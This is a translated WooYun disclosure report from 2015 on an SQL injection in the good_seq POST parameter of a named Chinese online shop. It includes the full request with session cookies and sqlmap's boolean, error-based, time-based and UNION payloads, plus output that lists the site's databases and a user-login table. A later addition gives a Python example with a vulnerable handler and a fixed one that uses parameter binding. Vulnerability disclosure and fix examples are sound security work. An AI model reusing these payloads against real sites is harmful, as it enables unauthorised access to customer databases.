Vulnerability summary

Defect ID: wooyun-2015-0140603

Title: 韩尚聚 POST injection

Vendor: koyimall.com

Author: 路人甲

Submitted: 2015-09-12 12:55

Fix time: 2015-09-17 12:56

Public disclosure: 2015-09-17 12:56

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-09-12: Details sent to the vendor, awaiting vendor handling
2015-09-17: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

You know the drill.

Details:

POST /?act=shop.goods_view&GS=202845&GC=GD00 HTTP/1.1
Host: www.koyimall.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://www.koyimall.com/?act=shop.goods_view&GS=202845&GC=GD00
Cookie: _ga=GA1.2.789240266.1441536364; lzstat_uv=28985152881159708506|3314588; Hm_lvt_f054d4659617a26eee16da122a9d036b=1441590333,1441770152,1441770157,1441977737; PHPSESSID=U11212204-164728861955f2d57c2a; lzstat_ss=638839446_18_1442006737_3314588; _gat=1; goods_list=%2F%3Fact%3Dshop.goods_list%26GC%3DGD00%26ST%3DSCODE1; Hm_lpvt_f054d4659617a26eee16da122a9d036b=1441977938; POPUP_DATA=-1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
act=shop.cart_act&mode=BUY&good_seq=202845&good_price=249&reurl=&good_cate=GD00&good_option_set%5B%5D=&good_option_set%5B%5D=&cart_count=1


Parameter: good_seq
You know the drill.

Proof of vulnerability:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: good_seq (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=shop.cart_act&mode=BUY&good_seq=202845 AND 2520=2520&good_price=249&reurl=&good_cate=GD00&good_option_set[]=&good_option_set[]=&cart_count=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: act=shop.cart_act&mode=BUY&good_seq=202845 AND (SELECT 4151 FROM(SELECT COUNT(*),CONCAT(0x71766b6271,(SELECT (ELT(4151=4151,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&good_price=249&reurl=&good_cate=GD00&good_option_set[]=&good_option_set[]=&cart_count=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: act=shop.cart_act&mode=BUY&good_seq=202845 AND (SELECT * FROM (SELECT(SLEEP(5)))YxAX)&good_price=249&reurl=&good_cate=GD00&good_option_set[]=&good_option_set[]=&cart_count=1

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: act=shop.cart_act&mode=BUY&good_seq=202845 UNION ALL SELECT NULL,CONCAT(0x71766b6271,0x59717577746261525468,0x71706b7871)-- &good_price=249&reurl=&good_cate=GD00&good_option_set[]=&good_option_set[]=&cart_count=1
---
[21:34:05] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.5
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] koyimall
[*] test
Database: koyimall
[168 tables]
| durian_user_login | 136143 |

Fix proposal:

I don't know.
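The report proposes no fix, so here is an added example (not from the report or from the vendor's code base; the shop runs PHP/MySQL, this stand-in uses Python and SQLite, and the table and column names are assumptions) showing the assumed bug pattern for good_seq beside a hardened handler: the field is validated as a bare integer and bound as a query parameter, so the boolean-based and UNION probes sqlmap listed above are rejected before any SQL runs.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for the shop database: the real site is PHP/MySQL and
# its table and column names are assumptions, not taken from the report.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE goods (good_seq INTEGER PRIMARY KEY, name TEXT, price INTEGER)")
    db.executemany("INSERT INTO goods VALUES (?, ?, ?)",
                   [(202845, "sample item", 249), (202846, "other item", 99)])
    return db

def validate_good_seq(body):
    """Allow-list check for the good_seq POST field: digits only, else None."""
    fields = parse_qs(body, keep_blank_values=True)
    raw = fields.get("good_seq", [""])[0]
    return int(raw) if raw.isdigit() else None

def lookup_goods_vulnerable(db, body):
    """Assumed bug pattern: the raw field is spliced into the SQL string, so
    whatever follows the number becomes part of the WHERE clause."""
    raw = parse_qs(body, keep_blank_values=True)["good_seq"][0]
    return db.execute("SELECT good_seq, name FROM goods WHERE good_seq=" + raw).fetchall()

def lookup_goods_fixed(db, body):
    """Hardened handler: reject anything but an integer (a real app would answer
    HTTP 400) and bind the value as a parameter, never as SQL text."""
    seq = validate_good_seq(body)
    if seq is None:
        return None
    return db.execute("SELECT good_seq, name FROM goods WHERE good_seq=?", (seq,)).fetchall()

# Constructed request bodies: the legitimate one from the report, then the
# boolean-based and UNION probes sqlmap listed for good_seq.
BODY_OK = ("act=shop.cart_act&mode=BUY&good_seq=202845&good_price=249&reurl=&good_cate=GD00"
           "&good_option_set%5B%5D=&good_option_set%5B%5D=&cart_count=1")
BODY_BOOL = BODY_OK.replace("good_seq=202845", "good_seq=202845 AND 2520=2520")
BODY_UNION = BODY_OK.replace("good_seq=202845", "good_seq=202845 UNION ALL SELECT NULL,'probe'-- ")

if __name__ == "__main__":
    db = make_db()
    for name, body in (("ok", BODY_OK), ("boolean", BODY_BOOL), ("union", BODY_UNION)):
        print(name, "vulnerable:", lookup_goods_vulnerable(db, body),
              "fixed:", lookup_goods_fixed(db, body))
```

Against the vulnerable handler the boolean probe still returns the row and the UNION probe adds a second, attacker-chosen row; the fixed handler returns None for both and the same single row for the legitimate body.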

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-09-17 12:56

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet